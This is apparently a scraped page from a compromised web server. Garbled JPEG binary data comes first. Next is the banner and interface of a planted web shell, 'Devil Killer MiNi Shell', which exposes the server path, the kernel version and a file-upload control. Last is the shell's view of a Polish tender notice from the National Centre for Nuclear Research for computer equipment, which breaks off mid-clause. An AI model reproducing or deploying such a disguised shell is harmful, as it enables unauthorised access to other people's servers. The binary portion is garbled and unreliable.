JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211231/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211231/0034187905-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa monitorów, komputerów stacjonarnych, laptopów oraz peryferii komputerowych na podstawie umowy ramowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Narodowe Centrum Badań Jądrowych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001024043</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Andrzeja Sołtana 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 22 273 16 94</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@ncbj.gov.p</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.ncbj.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Instytut badawczy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa monitorów, komputerów stacjonarnych, laptopów oraz peryferii komputerowych na podstawie umowy ramowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6bc1d86a-6a26-11ec-ae77-fe331fedffdc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00341879</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">05</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002558/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.59 Dostawa sprzętu komputerowego i akcesoriów </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.ncbj.gov.pl; https://platformazakupowa.pl/pn/ncbj <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ncbj.gov.pl; https://platformazakupowa.pl/pn/ncbj</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/ncbj<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia, powinien posiadać konto na Platformie zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie zakupowej oraz korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>Szczegółowe informacje określono w pkt. 14 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga dołączenia katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Opis zawarty jest w SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Opis zawarty jest w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.270.45.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: <br/>Dostawa monitorów, komputerów stacjonarnych, laptopów oraz peryferii komputerowych na podstawie umowy ramowej.<br/>2. Opis przedmiotu zamówienia oraz wymagania techniczne w zakresie przedmiotu zamówienia zostały zawarte w Formularzu 2.3. Wykaz parametrów technicznych oraz oferowanych urządzeń.<br/>3. Przedmiotem zamówienia jest sukcesywna dostawa sprzętu komputerowego do siedziby Zamawiającego realizowana według potrzeb na podstawie procedury realizacyjnej określonej w ppkt. 8, 9, 10.<br/>4. Szacowane ilości sprzętu komputerowego na podstawie zapotrzebowania roku 2021 wynoszą:<br/>a) monitory – 19 sztuk,<br/>b) komputery stacjonarne – 10 sztuk,<br/>c) komputery mobilne – 20 sztuk,<br/>d) peryferia komputerowe – 50 sztuk,<br/>Powyższe zapotrzebowanie nie uwzględnia sprzętu do badań naukowych ani planowanych do realizacji w 2022 r. <br/>Zamawiający nie gwarantuje realizacji ilości sprzętu określonego w ppkt. 4. Zamawiający informuję, że wartość wydatków ponoszonych na zakup sprzętu komputerowego w ostatnich latach wynosił średnio ok 640 tys. zł rocznie. Zamawiający zastrzega, że powyższa kwota nie stanowi zobowiązania ani gwarancji zakupu sprzętu o takiej wartości.<br/>5. Szczegółowe wymagania techniczne dotyczące przedmiotu zamówienia określa Formularz 2.3. Wykaz parametrów technicznych oraz oferowanych urządzeń, będący integralną częścią niniejszej specyfikacji. Wymagania techniczne stanowią wyłącznie podstawę do wyceny i porównania ofert. Zmawiający będzie zamawiał przedmiot umowy w oparciu o katalogi elektroniczne lub broszury informacyjne, reklamowe, katalogi papierowe w formacie pliku pdf itp., wskazane przez Wykonawców.<br/>6. Zamawiający zawrze umowę ramową z maksymalnie trzema Wykonawcami, których oferty spełniają wszystkie wymagania SWZ oraz ustawy Pzp i otrzymają najwyższą liczbę punktów na podstawie kryteriów oceny ofert określonych w pkt. 21. KRYTERIA OCENY OFERT niniejszej specyfikacji. W przypadku, gdy zostanie złożonych mniej ofert, Zamawiający zawrze umowę ramową ze wszystkimi Wykonawcami, którzy spełniają wszystkie wymagania SWZ oraz ustawy Pzp.<br/>7. Zamawiający wymaga dołączenia do oferty katalogu elektronicznego zawierającego, co najmniej wykaz sprzętu stanowiącego przedmiot postępowania w formacie nadającym się do przetwarzania danych. Katalog elektroniczny, powinien w szczególności zawierać opisy i zdjęcia produktów, oraz informacje o cenach i parametrach oferowanych produktów, umożliwiających weryfikację parametrów określonych w Formularzu 2.3. Wykaz parametrów technicznych oraz oferowanych urządzeń (oprócz informacji o wydajności osiągów, tzw. benchmarków). Zamawiający za prawidłowo złożony katalog elektroniczny uzna wskazany w Formularzu ofertowym adres sklepu internetowego Wykonawcy, który będzie zawierał informacje określone w zdaniu poprzednim. Zamawiający, dopuszcza w przypadku braku własnego sklepu internetowego, możliwość wskazania ogólnodostępnego sklepu innej firmy niż Wykonawcy, z tym że Wykonawca w trakcie trwania umowy ramowej nie może zmienić wskazania na inny sklep, ani też odmówić realizacji zamówienia lub umowy wykonawczej uzasadniając odmowe akcjami promocyjnymi firmy, na której adres strony się powołał.<br/>Zamawiający dopuszcza zamiennie zamiast katalogu elektronicznego złożenie broszur informacyjnych, reklamowych, katalogów papierowych w formacie pliku pdf, itp., zawierających opisy i zdjęcia produktów, oraz informacje o cenach i parametrach oferowanych produktów (oraz innych dostępnych u Wykonawcy), umożliwiających weryfikację parametrów określonych w Formularzu 2.3. Wykaz parametrów technicznych oraz oferowanych urządzeń (oprócz informacji o wydajności osiągów, tzw. benchmarków). Zamawiający za prawidłowo złożone broszury informacyjne, reklamowe, katalogi papierowe w formacie pliku pdf, itp., uzna określony w Formularzu ofertowym rodzaj dokumentu przez Wykonawcę, który będzie zawierał informacje określone w zdaniu poprzednim, oraz cechy wskazujące na Firmę Wykonawcy, dokument ten powinien być podpisany przez wykonawcę zgodnie z wymogami dla dokumentów oferty.<br/>8. Sposób realizacji przedmiotu postępowania do 130 tys. zł - po podpisaniu umowy ramowej Zamawiający będzie zamawiał, na podstawie zamówienia przesłanego za pośrednictwem poczty email, poszczególne przedmioty postępowania w oparciu o udostępnione katalogi elektroniczne (sklepy internetowe) lub broszury informacyjne, reklamowe, katalogi papierowe w formacie pliku pdf, itp., z uwzględnieniem wskazanego przez Wykonawcę w Formularzu cenowym opustu. Zamawiający każdorazowo, przed złożeniem zamówienia, zobowiązany będzie do porównania podobnych produktów u wszystkich Wykonawców, z którymi zawrze umowę ramową. Porównanie produktów odbędzie się na podstawie wydruków elektronicznych produktów udostępnionych w sklepach internetowych lub w broszurach informacyjnych, reklamowych, katalogach papierowych w formacie pliku pdf, itp., Wykonawców i zapisania porównywanych ofert do pliku .pdf. Zamawiający wraz z zamówieniem prześle Wykonawcy wydruk ze sklepu internetowego lub z broszury informacyjnej, reklamowej, katalogu papierowego w formacie pliku pdf, itp., Wykonawcy produktu, który jest zamawiany. Wydruk musi posiadać datę jego sporządzenia nie starszą niż 2 dni robocze od daty przesłania zamówienia. Wykonawca, który otrzyma zamówienie na podstawie powyższego trybu może odmówić realizacji uaktualniając jednocześnie parametry lub ceny katalogów elektronicznych (sklepu internetowego) lub broszur informacyjnych, reklamowych, katalogów papierowych w formacie pliku pdf, itp. Trzykrotna odmowa realizacji może stanowić podstawę rozwiązania umowy ramowej z Wykonawcą.<br/>9. Sposób realizacji przedmiotu postępowania powyżej 130 tys. zł - po podpisaniu umowy ramowej Zamawiający będzie zapraszał, na podstawie zaproszenia i umowy wykonawczej przesłanych za pośrednictwem poczty email, do potwierdzenia dostępności wymaganej ilości produktów przez Wykonawcę w zakresie poszczególnych przedmiotów postępowania w oparciu o udostępnione katalogi elektroniczne (sklepy internetowe) lub broszury informacyjne, reklamowe, katalogi papierowe w formacie pliku pdf, itp., z uwzględnieniem wskazanego przez Wykonawcę w Formularzu cenowym opustu. Zamawiający każdorazowo, przed złożeniem zaproszenia, zobowiązany będzie do porównania podobnych produktów u wszystkich Wykonawców, z którymi zawrze umowę ramową. Porównanie produktów odbędzie się na podstawie wydruków elektronicznych produktów udostępnionych w sklepach internetowych lub w broszurach informacyjnych, reklamowych, katalogach papierowych w formacie pliku pdf, itp., Wykonawców i zapisania porównywanych ofert do pliku .pdf. Zamawiający wraz z zaproszeniem prześle Wykonawcy wydruk ze sklepu internetowego lub z broszury informacyjnej, reklamowej, katalogu papierowego w formacie pliku pdf, itp., Wykonawcy produktów, do których realizacji zostanie zawarta umowa wykonawcza. Wydruk musi posiadać datę jego sporządzenia nie starszą niż 2 dni robocze od daty przesłania zaproszenia i umowy wykonawczej. Wykonawca, który otrzyma zamówienie na podstawie powyższego trybu może odmówić realizacji uaktualniając jednocześnie parametry lub ceny katalogów elektronicznych (sklepu internetowego) lub broszur informacyjnych, reklamowych, katalogów papierowych w formacie pliku pdf, itp. Trzykrotna odmowa realizacji może stanowić podstawę rozwiązania umowy ramowej z Wykonawcą.<br/>10. Zamawiający dopuszcza możliwość zamówień na produkty niewymienione w ppkt 4, a dostępne w katalogu elektronicznym (sklepie internetowym) lub w broszurach informacyjnych, reklamowych, katalogów papierowych w formacie pliku pdf, itp., wskazanych przez Wykonawcę w zakresie szeroko rozumianego sprzętu i peryferii komputerowych przy uwzględnieniu opustu w danej grupie produktów (zgodnie z wskazanym opustem - w Formularzu 2.2. Formularz cenowy). W przypadku realizacji takich zamówień Zamawiający będzie postępował tak jak opisano w ppkt 8, lecz Wykonawcy przysługuje prawo odmowy udzielania opustu lub realizacji zamówienia. Odmowa taka nie wlicza się do podstawy rozwiązania umowy.<br/>11. Zamawiający wymaga w stosunku do każdego przedmiotu postępowania zrealizowanego przez Wykonawcę 36 miesięcznej gwarancji biegnącej od dnia odbioru dostawy przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">30213300-8 - Komputer biurkowy</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">30237000-9 - Części, akcesoria i wyroby do komputerów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Opust</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda złożenia wraz z Ofertą następujących przedmiotowych środków dowodowych:<br/>	1) Formularz 2.3 IDW - Wykaz parametrów technicznych oraz oferowanych urządzeń. <br/>	2) Zamawiający wymaga dołączenia do oferty katalogu elektronicznego zawierającego, co najmniej wykaz sprzętu stanowiącego przedmiot postępowania w formacie nadającym się do przetwarzania danych. Katalog elektroniczny, powinien w szczególności zawierać opisy i zdjęcia produktów oraz informacje o cenach i parametrach oferowanych produktów, umożliwiających weryfikację parametrów określonych w Formularzu 2.3. Wykaz parametrów technicznych oraz oferowanych urządzeń (oprócz informacji o wydajności osiągów, tzw. benchmarków). Zamawiający za prawidłowo złożony katalog elektroniczny uzna wskazany w formularzu cenowym adres sklepu internetowego Wykonawcy, który będzie zawierał informacje określone w zdaniu poprzednim. Zamawiający, dopuszcza w przypadku braku własnego sklepu internetowego, możliwość wskazania ogólnodostępnego sklepu innej firmy niż Wykonawcy, z tym że Wykonawca w trakcie trwania umowy ramowej nie może zmienić wskazania na inny sklep, ani też odmówić realizacji zamówienia lub umowy wykonawczej uzasadniając odmowe akcjami promocyjnymi firmy, na której adres strony się powołał.<br/>Zamawiający dopuszcza zamiennie zamiast katalogu elektronicznego złożenie broszur informacyjnych, reklamowych, katalogów papierowych w formacie pliku pdf, itp., zawierających opisy i zdjęcia produktów, oraz informacje o cenach i parametrach oferowanych produktów (oraz innych dostępnych u Wykonawcy), umożliwiających weryfikację parametrów określonych w Formularzu 2.3. Wykaz parametrów technicznych oraz oferowanych urządzeń (oprócz informacji o wydajności osiągów, tzw. benchmarków). Zamawiający za prawidłowo złożone broszury informacyjne, reklamowe, katalogi papierowe w formacie pliku pdf, itp., uzna określony w Formularzu ofertowym rodzaj dokumentu przez Wykonawcę, który będzie zawierał informacje określone w zdaniu poprzednim, oraz cechy wskazujące na Firmę Wykonawcy, dokument ten powinien być podpisany przez wykonawcę zgodnie z wymogami dla dokumentów oferty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne Zamawiający wezwie Wykonawcę do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 10.2 IDW składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 ust. 1 pkt. 1 Ustawy, Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach i na następujących warunkach:<br/>a) zmiana w obowiązujących przepisach prawa, powodująca konieczność dokonania zmian w Umowie. Zmiana wynagrodzenia z tego tytułu obejmuje dostawy wykonane po dacie wejścia w życie przepisów regulujących powyższe zmiany.<br/>b) zmiana terminu realizacji Przedmiotu Umowy w następujących przypadkach:<br/>- przestojów i opóźnień niezawinionych przez Wykonawcę, mających bezpośredni wpływ na terminowość wykonania dostaw; zmiana polega na przedłużeniu terminu o okres przestojów i opóźnień;<br/>- innych przerw w realizacji dostawy, powstałych z przyczyn niezależnych od Wykonawcy; zmiana polega na przedłużeniu terminu o okres zaistniałych przerw;<br/>- dopuszcza się zmianę terminu realizacji Umowy na podstawie wniosku złożonego przez Stronę o wydłużenie terminu realizacji umowy w szczególności w przypadku zwiększenia zakresu jej realizacji wynikającego z wniosku o zwiększenie wartości Umowy;<br/>c) w przypadku zaistnienia, przypadku siły wyższej, przez którą, na potrzeby niniejszego postępowania Strony rozumieją zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć oraz którego Strony nie mogły uniknąć ani któremu nie mogły zapobiec przy zachowaniu należytej staranności. Za siłę wyższą, warunkującą zmianę Umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, pandemię, epidemię, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia. Strony dopuszczają m.in. możliwość zmiany Umowy w przypadku wystąpienia okoliczności utrudniających lub uniemożliwiających realizację Umowy w związku z występowaniem Covid -19.<br/>2. Powyższe postanowienia określone w ust. 1 pkt. b stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, nie stanowiąc jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.<br/>3. W przypadku zaistnienia sytuacji określonej w ust. 1 niniejszego paragrafu Wykonawca jest 